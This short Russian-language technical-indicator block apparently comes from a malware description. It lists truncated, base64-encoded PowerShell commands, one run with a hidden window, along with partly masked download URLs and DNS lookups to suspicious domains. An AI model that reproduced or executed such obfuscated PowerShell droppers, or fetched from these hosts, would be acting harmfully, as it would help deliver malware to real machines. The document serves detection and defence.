Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQBUAC0AdgBBAHIAaQBhAGIATABlACAAIAAoACcATgA4ACcAKwAnADAAQgBoAHcAJwApACAAIAAoACAAWwB0AHkAUABlAF0AKAAiAHsANAB9AHsAMQB9AHsANQB9AHsAMwB9AHsAMAB9AHsAMgB9ACIALQBGACcARA...
- http://he##kan.bio/js/T8oCHm/
- http://ca####anherbinc.ru/
- DNS ASK ma####hdigital.com
- DNS ASK he##kan.bio
- DNS ASK ca####anherbinc.ru
- DNS ASK ju#####marinesales.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQBUAC0AdgBBAHIAaQBhAGIATABlACAAIAAoACcATgA4ACcAKwAnADAAQgBoAHcAJwApACAAIAAoACAAWwB0AHkAUABlAF0AKAAiAHsANAB9AHsAMQB9AHsANQB9AHsAMwB9AHsAMAB9AHsAMgB9ACIALQBGACcARA...' (со скрытым окном)